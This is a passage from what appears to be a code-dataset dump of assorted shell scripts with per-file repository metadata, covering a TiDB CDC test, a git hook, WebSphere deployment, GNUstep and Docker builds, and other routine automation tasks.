}
function goSql() {
for i in {1..3}
do
go-ycsb load mysql -P $CUR/conf/workload -p mysql.host=${UP_TIDB_HOST} -p mysql.port=${UP_TIDB_PORT} -p mysql.user=root -p mysql.db=testSync
sleep 2
ddl
sleep 2
done
}
function deployConfig() {
cat $CUR/conf/diff_config_part1.toml > $CUR/conf/diff_config.toml
echo "snapshot = \"$1\"" >> $CUR/conf/diff_config.toml
cat $CUR/conf/diff_config_part2.toml >> $CUR/conf/diff_config.toml
echo "snapshot = \"$2\"" >> $CUR/conf/diff_config.toml
}
# check wheter the given tso happens in a DDL job, if true returns the start_ts
# and commit_ts of the DDL job
function checkPrimaryTsNotInDDL() {
primary_ts=$1
tsos=$2
count=$(( ${#tsos[@]} / 2 ))
for i in $(seq 1 $count); do
start_ts=${tsos[(( 2 * $i - 2 ))]}
commit_ts=${tsos[(( 2 * $i - 1 ))]}
if [[ ($primary_ts > $start_ts) && ($primary_ts < $commit_ts) ]]; then
echo "$start_ts $commit_ts"
fi
done
}
function checkDiff() {
primaryArr=(`grep primary_ts $OUT_DIR/sql_res.$TEST_NAME.txt | awk -F ": " '{print $2}'`)
secondaryArr=(`grep secondary_ts $OUT_DIR/sql_res.$TEST_NAME.txt | awk -F ": " '{print $2}'`)
tsos=($(curl -s http://$UP_TIDB_HOST:$UP_TIDB_STATUS/ddl/history |grep -E "start_ts|FinishedTS"|grep -oE "[0-9]*"))
num=${#primaryArr[*]}
for ((i=0;i<$num;i++))
do
check_in_ddl=$(checkPrimaryTsNotInDDL ${primaryArr[$i]} $tsos)
if [[ ! -z $check_in_ddl ]]; then
echo "syncpoint ${primaryArr[$i]} ${secondaryArr[$i]} " \
"is recorded in a DDL event(${check_in_ddl[0]}), skip the check of it"
continue
fi
deployConfig ${primaryArr[$i]} ${secondaryArr[$i]}
check_sync_diff $WORK_DIR $CUR/conf/diff_config.toml
done
rm $CUR/conf/diff_config.toml
}
function run() {
if [ "$SINK_TYPE" != "mysql" ]; then
echo "kafka downstream isn't support syncpoint record"
return
fi
rm -rf $WORK_DIR && mkdir -p $WORK_DIR
start_tidb_cluster --workdir $WORK_DIR
cd $WORK_DIR
start_ts=$(run_cdc_cli tso query --pd=http://$UP_PD_HOST_1:$UP_PD_PORT_1)
run_sql "CREATE DATABASE testSync;"
run_cdc_server --workdir $WORK_DIR --binary $CDC_BINARY
SINK_URI="mysql://root@127.0.0.1:3306/?max-txn-row=1"
run_cdc_cli changefeed create --start-ts=$start_ts --sink-uri="$SINK_URI" --sync-point --sync-interval=10s
goSql
check_table_exists "testSync.USERTABLE" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
check_table_exists "testSync.simple1" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
check_table_exists "testSync.simple2" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
sleep 60
run_sql "SELECT primary_ts, secondary_ts FROM tidb_cdc.syncpoint_v1;" ${DOWN_TIDB_HOST} ${DOWN_TIDB_PORT}
echo "____________________________________"
cat "$OUT_DIR/sql_res.$TEST_NAME.txt"
checkDiff
check_sync_diff $WORK_DIR $CUR/conf/diff_config_final.toml
cleanup_process $CDC_BINARY
}
trap stop_tidb_cluster EXIT
run $*
check_cdc_state_log $WORK_DIR
echo "[$(date)] <<<<<< run test case $TEST_NAME success! >>>>>>"
| true
|
f1d3e153b0c6ceba833d0786732104aebe255879
|
Shell
|
flaviovdf/webp2p-ufcg
|
/WebP2P-Simulator/sim_plotter.sh
|
UTF-8
| 898
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
find_self() {
SELF=`dirname $0`
}
usage() {
echo "usage $0 <sim.properties files> <sim type> <param to vary> < values[] || -seq <first> <last> <inc> >"
exit 1
}
#MAIN
if [ $# -lt 3 ]; then
usage
fi
find_self
FILE=$1
TYPE=$2
PARAM=$3
OPTION=$4
if [ ! -r $FILE ]; then
echo "cannot read $FILE"
exit 1
fi
NEWPROP=/tmp/sim.prop.tmp
shift 3
VALUES=$*
if [ "$1" == "-seq" ]; then
if [ $# -lt 4 ]; then
usage
fi
FIRST=$2
LAST=$3
INC=$4
VALUES=`seq $FIRST $INC $LAST`
fi
NRUNS=100
for newparam in $VALUES; do
for i in `seq $NRUNS`; do
echo "simulator.log simulator_${PARAM}-${newparam}_RUN-${i}.log"
rm -f simulator.log
sed "s/$PARAM *= *[0-9]*\.*[0-9]*/$PARAM = $newparam/" $FILE > $NEWPROP
sh $SELF/run.sh $TYPE $NEWPROP | grep = | awk '{print $NF}'
cp simulator.log simulator_${PARAM}-${newparam}_RUN-${i}.log
rm -f $NEWPROP
done
done
| true
|
a3190a350c44a3b274be64f2cb72baebef5a4ee8
|
Shell
|
tadasv/git-hooks
|
/post-commit
|
UTF-8
| 828
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# An example hook script that is called after a successful
# commit is made.
#
# To enable this hook, rename this file to "post-commit".
# Keep history of commits
# TODO move this into a separate script
. git-sh-setup
TOTAL_DIFF=`git diff-tree --no-prefix -r HEAD | {
total=0
while read A B C D M P
do
case $M in
M) bytes=$(( $(git cat-file -s $D) - $(git cat-file -s $C) )) ;;
A) bytes=$(git cat-file -s $D) ;;
D) bytes=-$(git cat-file -s $C) ;;
*)
continue
;;
esac
total=$(( $total + $bytes ))
done
echo $total
}`
COMMIT_LOG_FOLDER=/Users/tadas/logs/git
LOG_FILE=`date +commits-%Y-%m-%d.log`
LAST_COMMIT=`git log --pretty=format:"%H %ct ${TOTAL_DIFF} %s" -n 1`
mkdir -p ${COMMIT_LOG_FOLDER}
echo ${LAST_COMMIT} >> ${COMMIT_LOG_FOLDER}/${LOG_FILE}
| true
|
eb6bf2fb7e78f5eb86808cb908cd66c12d9e9657
|
Shell
|
joelmahoney/discoverbps
|
/.gems/gems/unicorn-4.8.2/t/t0007-working_directory_no_embed_cli.sh
|
UTF-8
| 925
| 2.890625
| 3
|
[
"GPL-3.0-or-later",
"GPL-1.0-only",
"GPL-2.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-public-domain",
"GPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"MIT"
] |
permissive
|
#!/bin/sh
. ./test-lib.sh
t_plan 4 "config.ru inside alt working_directory (no embedded switches)"
t_begin "setup and start" && {
unicorn_setup
rm -rf $t_pfx.app
mkdir $t_pfx.app
cat > $t_pfx.app/config.ru <<EOF
use Rack::ContentLength
use Rack::ContentType, "text/plain"
run lambda { |env| [ 200, {}, [ "#{\$master_ppid}\\n" ] ] }
EOF
# the whole point of this exercise
echo "working_directory '$t_pfx.app'" >> $unicorn_config
# allows ppid to be 1 in before_fork
echo "preload_app true" >> $unicorn_config
cat >> $unicorn_config <<\EOF
before_fork do |server,worker|
$master_ppid = Process.ppid # should be zero to detect daemonization
end
EOF
cd /
unicorn -D -c $unicorn_config
unicorn_wait_start
}
t_begin "hit with curl" && {
body=$(curl -sSf http://$listen/)
}
t_begin "killing succeeds" && {
kill $unicorn_pid
}
t_begin "response body ppid == 1 (daemonized)" && {
test "$body" -eq 1
}
t_done
| true
|
fceed27116de321da76c81bc050efc763e8b222d
|
Shell
|
durianpeople/SoalShift_modul1_E03
|
/soal3.sh
|
UTF-8
| 510
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
choose() { echo ${1:RANDOM%${#1}:1} $RANDOM; }
pass="$({ choose '0123456789'
choose 'abcdefghijklmnopqrstuvwxyz'
choose 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in $( seq 1 $(( 9 )) )
do
choose '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
done
} | sort -R | awk '{printf "%s",$1}')"
flag=1
while true
do
if [ ! -f /home/akmal/Documents/Password$flag.txt ]
then
echo $pass > /home/akmal/Documents/Password$flag.txt
break
else
flag=$((flag + 1))
fi
done
| true
|
8ad4ae42eecd376ca2e5f7e477dbac88bb2ff224
|
Shell
|
JaganMandalapu/websphere_automation
|
/was/deploy/deployApp.sh
|
UTF-8
| 2,191
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# This scripts calls installApp.py script to install an application to a JVM
source /data/shared_scripts/resources.sh
ID=`id -un`
WAS_VERSION=$2 #was9
APP_NAME=$3
BUSINESS_AREA=$4
JNDI=$5
DB_USER=$6
DB_PASSWORD=$7
APP_SERVER_NAME=${APP_NAME}_appserver
HOST_NAME=`hostname -s`
NODE_NAME=${HOST_NAME}Node_${BUSINESS_AREA}
ear_dir=/data/apps/${APP_NAME}/${WAS_VERSION}/deploy
ear_files=`ls -lrt $ear_dir`
ear_array=($ear_files)
ear_file=`echo ${ear_array[${#ear_array[@]}-1]}`
ear=$ear_dir/$ear_file
installApp_script=/data/shared_scripts/deploy/installApp.py
updateApp_script=/data/shared_scripts/deploy/updateApp.py
startSingleServer_script=/data/shared_scripts/deploy/startSingleServer.py
stopSingleServer_script=/data/shared_scripts/deploy/stopSingleServer.py
if [ $ID != "$RUN_AS_ID" ] ; then
echo "The script needs to be run as $RUN_AS_ID"
echo "Exiting now.."
exit 1
fi
if [[ $APP_NAME == "" ]] ; then
echo
echo "Application name cannot be empty!"
exit 1
fi
installApp() {
# Installing the application
$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
$installApp_script $APP_NAME $ear $NODE_NAME $APP_SERVER_NAME $JNDI $DB_USER $DB_PASSWORD ${APP_NAME}_vhost
stopAppServer
startAppServer
}
updateApp() {
# Update the appliaction
$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
$updateApp_script $APP_NAME $ear
stopAppServer
startAppServer
}
stopAppServer() {
# Stop the JVM
$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
$stopSingleServer_script $NODE_NAME $APP_SERVER_NAME
sleep 30
}
startAppServer() {
# Start the JVM
$WSADMIN_DIR/wsadmin.sh -lang jython -username $WAS_ADMIN_ID -password $WAS_ADMIN_PASSWORD -f \
$startSingleServer_script $NODE_NAME $APP_SERVER_NAME
sleep 30
}
case $1 in
install)
echo
echo "Installing the $APP_NAME application"
echo
installApp
;;
update)
echo
echo "Updating the $APP_NAME application"
echo
updateApp
;;
*)
echo
echo "Usage: $0 [install|update]"
;;
esac
| true
|
70025f884edcb09d515078caa9c0a3ea8e11ce96
|
Shell
|
hacktoolkit/mac-bootstrap
|
/bin/ssh-start.sh
|
UTF-8
| 640
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
if [ -z $SSH_AGENT_FILENAME ]; then
SSH_AGENT_FILENAME="$HOME/.ssh-vars.$HOSTNAME.sh"
fi;
touch $SSH_AGENT_FILENAME;
ssh-agent -s > $SSH_AGENT_FILENAME
chmod a+x $SSH_AGENT_FILENAME
perl -i -n -e 'print $_ unless /^echo/' $SSH_AGENT_FILENAME
source $SSH_AGENT_FILENAME
#ssh-add
KEYS="$HOME/.ssh/*.pub"
TOADD=""
for pubkey in $KEYS
do
#FILENAME=$(basename ${pubkey})
#EXTENSION=${pubkey##*.}
PRIV_KEY=${pubkey%.*}
#echo ${EXTENSION}
#echo ${PRIV_KEY}
if [ -e ${PRIV_KEY} ]
then
echo Adding to keychain: ${PRIV_KEY}
ssh-add -K ${PRIV_KEY}
#keychain -q ${PRIV_KEY}
fi
done
| true
|
b5bd8e6f7c48d3657aa550425cf07bbce5fc5ca0
|
Shell
|
rogeriopradoj/dunit-images
|
/vectorface-dunit/build-all.sh
|
UTF-8
| 1,799
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
docker pull debian:squeeze
docker pull debian:wheezy
# php 5.2
docker build -t vectorface/php5.2 ./php5.2
docker save `docker history -q vectorface/php5.2 | head -n 1` | sudo TMPDIR=/var/run/shm docker-squash -t vectorface/php5.2 -from `docker history -q debian:squeeze | head -n 1` | docker load
docker push vectorface/php5.2
# php-base
docker build -t vectorface/php-base ./php-base
docker save `docker history -q vectorface/php-base | head -n 1` | sudo TMPDIR=/var/run/shm docker-squash -t vectorface/php-base -from `docker history -q debian:wheezy | head -n 1` | docker load
docker push vectorface/php-base
# hhvm-base
docker build -t vectorface/hhvm-base ./hhvm-base
docker save `docker history -q vectorface/hhvm-base | head -n 1` | sudo TMPDIR=/var/run/shm docker-squash -t vectorface/hhvm-base -from `docker history -q debian:wheezy | head -n 1` | docker load
docker push vectorface/hhvm-base
# php 5.3, 5.4, 5,5, 5.6, nightly
for version in php5.3 php5.4 php5.5 php5.6 php-nightly
do
docker build -t vectorface/$version ./$version
# php 5.3 cannot be squashed right now
if [ $version != "php5.3" ]; then
docker save `docker history -q vectorface/$version | head -n 1` | sudo TMPDIR=/var/run/shm docker-squash -t vectorface/$version -from `docker history -q vectorface/php-base | head -n 1` | docker load
fi
docker push vectorface/$version
done
# hhvm and hhvm-nightly
for version in hhvm hhvm-nightly
do
docker build -t vectorface/$version ./$version
docker save `docker history -q vectorface/$version | head -n 1` | sudo TMPDIR=/var/run/shm docker-squash -t vectorface/$version -from `docker history -q vectorface/hhvm-base | head -n 1` | docker load
docker push vectorface/$version
done
| true
|
0969ea71d330ded080567ccc69543cbf9b08a2dc
|
Shell
|
seanpm2001/GNUStep_Tools-Installers
|
/nsis/native-compile.sh
|
UTF-8
| 10,910
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
# Semi-automatic, useful reminder for how to native compile packages
# Work in progress. Need to clean this up and make it useful...
#
# Usage:
# ./native-compile.sh [gnustep] [all | libffi | objc | make | base | gui | back]
# - default (no args) compile only dependencies (xml, etc)
# gnustep - compile only gnustep core
# all - compile all gnustep (including libffi, objc)
# xxx - compile specific package
# Location of sources, packages, etc. Change to suit
HOME_DIR=/z/Source/nsis
PACKAGE_DIR=$HOME_DIR/packages
SOURCES_DIR=$HOME_DIR/sources
GNUSTEP_DIR=$HOME_DIR/sources/gstep/current
make_package()
{
echo "Cleaning $PACKAGE"
cd $SOURCES_DIR/build/${PACKAGE}*
if [ -f config.status ]; then
#make distclean
make clean
fi
# FIXME: Need a patch for p11-kit (trying to link an .so file in ./p11-kit)
if [ $PACKAGE = icu ]; then
#patch -N -p1 -i < ../../icu4c-4_6-mingw-gnustep.diff
cd source
fi
echo "Configuring $PACKAGE"
if [ $PACKAGE != zlib ]; then
if [ $PACKAGE = jpeg ]; then
# Need this as gcc 4.6 screws up longjmp when there is no frame pointer
# http://gcc.gnu.org/ml/gcc/2011-10/msg00324.html
CFLAGS="-g -O2 -fno-omit-frame-pointer" ./configure --prefix=/mingw $PACKAGE_CONFIG
elif [ $PACKAGE = mman ]; then
./configure --prefix=/mingw
else
./configure --prefix=/mingw $PACKAGE_CONFIG
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
return
fi
fi
fi
echo "Making $PACKAGE"
if [ $PACKAGE = zlib ]; then
#make -f win32/Makefile.gcc CFLAGS="$CFLAGS"
make -f win32/Makefile.gcc
else
make
fi
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
return
fi
make install
rm -rf $PACKAGE_DIR/${PACKAGE}
mkdir -p $PACKAGE_DIR/${PACKAGE}
if [ $PACKAGE = jpeg ]; then
mkdir -p $PACKAGE_DIR/${PACKAGE}/bin
mkdir -p $PACKAGE_DIR/${PACKAGE}/lib
mkdir -p $PACKAGE_DIR/${PACKAGE}/man
mkdir -p $PACKAGE_DIR/${PACKAGE}/man1
make DESTDIR=$PACKAGE_DIR/${PACKAGE}/ install
else
make DESTDIR=$PACKAGE_DIR/${PACKAGE}/ install
fi
}
# Flags required for Win2K and perhaps other systems
#CFLAGS="-g"
#export CFLAGS
#
# Dependancies
#
if [ x$1 != xgnustep ]; then
packages="libxml2 jpeg tiff libpng libgpg-error libgcrypt p11-kit nettle gnutls icu libsndfile libao"
if [ x$1 != x ]; then
packages=$*
fi
for name in $packages; do
# Notes:
PACKAGE=$name
PACKAGE_CONFIG="--enable-shared"
if [ $PACKAGE = icu ]; then
PACKAGE_CONFIG="$PACKAGE_CONFIG --libdir=/mingw/bin --disable-strict"
fi
if [ $PACKAGE = gnutls ]; then
PACKAGE_CONFIG="$PACKAGE_CONFIG --with-libgcrypt --disable-guile"
fi
if [ $PACKAGE = libsndfile ]; then
#PACKAGE_CONFIG="$PACKAGE_CONFIG --disable-alsa --disable-jack --disable-sqlite --disable-shave"
PACKAGE_CONFIG="$PACKAGE_CONFIG --disable-shave"
fi
if [ $PACKAGE = fontconfig ]; then
PACKAGE_CONFIG="$PACKAGE_CONFIG --enable-libxml2"
fi
make_package
done
exit 0
fi
#
# GNUstep
#
# . /GNUstep/System/Library/Makefiles/GNUstep.sh
export GNUSTEP_INSTALLATION_DOMAIN=SYSTEM
#
# GNustep-make
#
#
if [ x$2 = xall -o x$2 = xmake ]; then
echo "========= Making GNUstep Make ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-make-*
tar -zxf $GNUSTEP_DIR/gnustep-make-*tar.gz
cd gnustep-make-*
if [ -f config.status ]; then
make distclean
fi
./configure --prefix=/GNUstep -with-layout=gnustep --with-config-file=/GNUstep/GNUstep.conf
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
rm -rf $PACKAGE_DIR/gnustep-make/
make DESTDIR=$PACKAGE_DIR/gnustep-make/ install
fi
. /GNUstep/System/Library/Makefiles/GNUstep-reset.sh
. /GNUstep/System/Library/Makefiles/GNUstep.sh
if [ x$2 = xall -o x$2 = xlibffi ]; then
#
# libffi
#
echo "========= Making libffi ========="
cd $SOURCES_DIR/gstep
#rm -rf libffi-*
tar -zxf $GNUSTEP_DIR/libffi-*tar.gz
cd $SOURCES_DIR/gstep/libffi-*
patch -N -p0 < $HOME_DIR/libffi-includes*.patch
if [ -f config.status ]; then
make distclean
fi
./configure --prefix=/GNUstep/System --libdir=/GNUstep/System/Library/Libraries --includedir=/GNUstep/System/Library/Headers --bindir=/GNUstep/System/Tools --enable-shared
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make LN=cp LN_S=cp
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
make install
mv /GNUstep/System/Library/bin/*dll /GNUstep/System/Tools
mv /GNUstep/System/Library/Libraries/libffi-3.0.13/include/* /GNUstep/System/Library/Headers
rm -rf $PACKAGE_DIR/libffi
mkdir -p $PACKAGE_DIR/libffi
mkdir -p $PACKAGE_DIR/libffi/GNUstep/System/Tools
mkdir -p $PACKAGE_DIR/libffi/GNUstep/System/Library/Libraries
make DESTDIR=$PACKAGE_DIR/libffi install
fi
#
# GNUstep objc
#
if [ x$2 = xall -o x$2 = xobjc ]; then
echo "========= Making objc ========="
cd $SOURCES_DIR/gstep
#tar -zxf $GNUSTEP_DIR/gnustep-objc-*tar.gz
cd $SOURCES_DIR/gstep-current/libobjc2*
make clean
make
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
make install
# strip the dll
#strip /GNUstep/System/Tools/objc-1.dll
rm -rf $PACKAGE_DIR/gnustep-objc2
mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-objc2/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-objc2 install
fi
#
# GNustep-make (AGAIN!)
#
if [ x$2 = x -o x$2 = xall -o x$2 = xmake ]; then
echo "========= Making GNUstep Make ========="
cd $SOURCES_DIR/gstep
#rm -rf gnustep-make-*
#tar -zxf $GNUSTEP_DIR/gnustep-make-*tar.gz
cd gnustep-make-*
./configure --prefix=/GNUstep -with-layout=gnustep --with-config-file=/GNUstep/GNUstep.conf
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
rm -rf $PACKAGE_DIR/gnustep-make/
make DESTDIR=$PACKAGE_DIR/gnustep-make/ install
fi
#
# GNUstep base
#
if [ x$2 = x -o x$2 = xall -o x$2 = xbase ]; then
echo "========= Making GNUstep Base ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-base-*
tar -zxf $GNUSTEP_DIR/gnustep-base-*tar.gz
cd gnustep-base-*
if [ -f config.status ]; then
make distclean
fi
./configure --disable-xslt --with-installation-domain=SYSTEM
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-base
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-base/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-base install
fi
#
# GNustep Gui
#
if [ x$2 = x -o x$2 = xall -o x$2 = xgui ]; then
echo "========= Making GNUstep GUI ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-gui-*
tar -zxf $GNUSTEP_DIR/gnustep-gui-*tar.gz
cd gnustep-gui-*
if [ -f config.status ]; then
make distclean
fi
./configure --with-include-flags=-fno-omit-frame-pointer
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make messages=yes install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-gui
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-gui/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-gui install
fi
#
# GNustep Back
#
if [ x$2 = x -o x$2 = xall -o x$2 = xback ]; then
echo "========= Making GNUstep Back ========="
cd $SOURCES_DIR/gstep
rm -rf gnustep-back-*
tar -zxf $GNUSTEP_DIR/gnustep-back-*tar.gz
cd gnustep-back-*
if [ -f config.status ]; then
make distclean
fi
./configure
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-back
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-back/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-back install
fi
#
# GNustep WinUXTheme
#
if [ x$2 = x -o x$2 = xall -o x$2 = xtheme ]; then
echo "========= Making GNUstep WinUXTheme ========="
cd $SOURCES_DIR/gstep-current
cd WinUXTheme
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/WinUXTheme
mkdir -p $PACKAGE_DIR/WinUXTheme/GNUstep/System/Library/Libraries/Themes
make DESTDIR=$PACKAGE_DIR/WinUXTheme install
fi
#
# Cairo backend
#
if [ x$2 = xcairo ]; then
# Make sure to install precompiled pacakages:
# FIXME: bug in freetype - have to type make manually?!?!?!
# FIXME: bug in cairo - need to add -lpthread to src/Makefile (?_LIBS)
if [ x$3 = xall ]; then
packages="freetype fontconfig pixman cairo"
PACKAGE_CONFIG=
for name in $packages; do
PACKAGE=$name
make_package
done
fi
echo "========= Making GNUstep Back (Cairo) ========="
cd $SOURCES_DIR/gstep
cd gnustep-cairo-*
if [ -f config.status ]; then
make distclean
fi
./configure --enable-graphics=cairo --with-name=cairo
gsexitstatus=$?
if [ "$gsexitstatus" != 0 -o \! -f config.status ]; then
gsexitstatus=1
exit 1
fi
make install
gsexitstatus=$?
if [ $gsexitstatus != 0 ]; then
gsexitstatus=1
exit
fi
rm -rf $PACKAGE_DIR/gnustep-cairo
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Libraries
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Makefiles
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Library/Headers
mkdir -p $PACKAGE_DIR/gnustep-cairo/GNUstep/System/Tools
make DESTDIR=$PACKAGE_DIR/gnustep-cairo install
fi
#
# Developer package
#
if [ x$2 = xdevel ]; then
# Make sure to install precompiled pacakages:
# perl
if [ x$3 = xall ]; then
packages="autoconf libtool"
PACKAGE_CONFIG=
for name in $packages; do
PACKAGE=$name
# FIXME Need to make in /usr
done
fi
fi
| true
|
cc7af27ac7ea31a51b443e5dfcdffcb3831ffa6b
|
Shell
|
casjay-dotfiles/scripts
|
/helpers/man/anime-dl
|
UTF-8
| 3,833
| 3.4375
| 3
|
[
"WTFPL"
] |
permissive
|
#!/usr/bin/env bash
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# This is what I use for my system scripts
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
##@Version : 202207042244-git
# @Author : Jason Hempstead
# @Contact : jason@casjaysdev.pro
# @License : LICENSE.md
# @ReadME : anime-dl --help
# @Copyright : Copyright: (c) 2022 Jason Hempstead, Casjays Developments
# @Created : Tuesday, Jul 05, 2022 13:46 EDT
# @File : anime-dl
# @Description : Search and download anime
# @TODO :
# @Other :
# @Resource :
# @sudo/root : no
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Set variables
APPNAME_README="anime-dl"
__heading="- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Set functions
__sed_head() { sed 's#..* :##g;s#^ ##g'; }
__printf_head() { __printf_color "\n$__heading\n$2\n$__heading\n" "$1"; }
__grep_head() { grep -sE '[".#]?@[A-Z]' "$(type -P "${2:-systemmgr}")" | grep "${1:-}"; }
__printf_color() { printf "%b" "$(tput setaf "$2" 2>/dev/null)" "$1" "$(tput sgr0 2>/dev/null)"; }
__version() { __grep_head 'Version' "$(type -P "${2:-systemmgr}")" | __sed_head | head -n1 | grep '^'; }
__printf_help() {
test -n "$1" && test -z "${1//[0-9]/}" && local color="$1" && shift 1 || local color="4"
local msg="$*"
shift
__printf_color "$msg\n" "$color"
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
printf '\n'
__printf_head "5" "$APPNAME_README: $(__grep_head "Description" "$APPNAME_README" | __sed_head)"
__printf_help " " " "
__printf_help "5" "Usage: $APPNAME_README [-c,-a,-d,-q,-v]"
__printf_help "4" "-c - continue watching anime from history"
__printf_help "4" "-a - specify episode to watch"
__printf_help "4" "-h - show helptext"
__printf_help "4" "-d - download episode"
__printf_help "4" "-p - download episode to specified directory"
__printf_help "4" "-q - set video quality (best|worst|360|480|720|1080)"
__printf_help "4" "-v - use VLC as the media player"
__printf_help "4" "-D - delete history"
__printf_help "4" "-U - fetch update from github"
__printf_help "4" "-V - print version number and exit"
__printf_help " " " "
__printf_head "5" "Other $APPNAME_README Options"
__printf_help "4" "$APPNAME_README --config - Generate user config file"
__printf_help "4" "$APPNAME_README --version - Show script version"
__printf_help "4" "$APPNAME_README --help - Shows this message"
__printf_help "4" "$APPNAME_README --options - Shows all available options"
__printf_help " " " "
#__printf_head "5" "This is a work in progress"
#__printf_help "4" "$APPNAME_README "
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# end help
printf '\n'
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# End application
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# lets exit with code
#exit "${exitCode:-0}"
| true
|
da01054d5f8b8eb9d91265b524075cf5e9be55f8
|
Shell
|
tataranovich/mc-buildbot
|
/target-build.sh
|
UTF-8
| 4,014
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
SUPPORTED_TARGETS="jessie-i386 jessie-amd64 stretch-i386 stretch-amd64 buster-i386 buster-amd64 bullseye-i386 bullseye-amd64 sid-i386 sid-amd64 trusty-i386 trusty-amd64 xenial-i386 xenial-amd64 bionic-i386 bionic-amd64 focal-amd64 groovy-amd64 hirsute-amd64"
UNCLEAN_BUILD=0
die() {
warn "$1"
exit 1
}
warn() {
if [ ! -z "$1" ]; then
echo "BUILDBOT: $1" >&2
fi
}
show_usage() {
echo "Example: target-build.sh --src package_1.0-1.dsc --target lenny-i386 --repository main/p/package --output ~/tmp/20120628"
exit 1
}
parse_cmdline() {
if [ $# -eq 0 ]; then
show_usage
fi
set -- `getopt -u --longoptions="src: target: repository: output:" -- -- "$@"` || show_usage
while [ $# -gt 0 ]
do
case "$1" in
--src)
BUILD_SRC="$2"
shift
;;
--target)
BUILD_TARGET=`echo "$2" | sed -e 's/,/\ /g'`
shift
;;
--repository)
BUILD_REPO_PATH="$2"
shift
;;
--output)
BUILD_OUTPUT="$2"
shift
;;
--)
shift
break
;;
*)
break
esac
shift
done
}
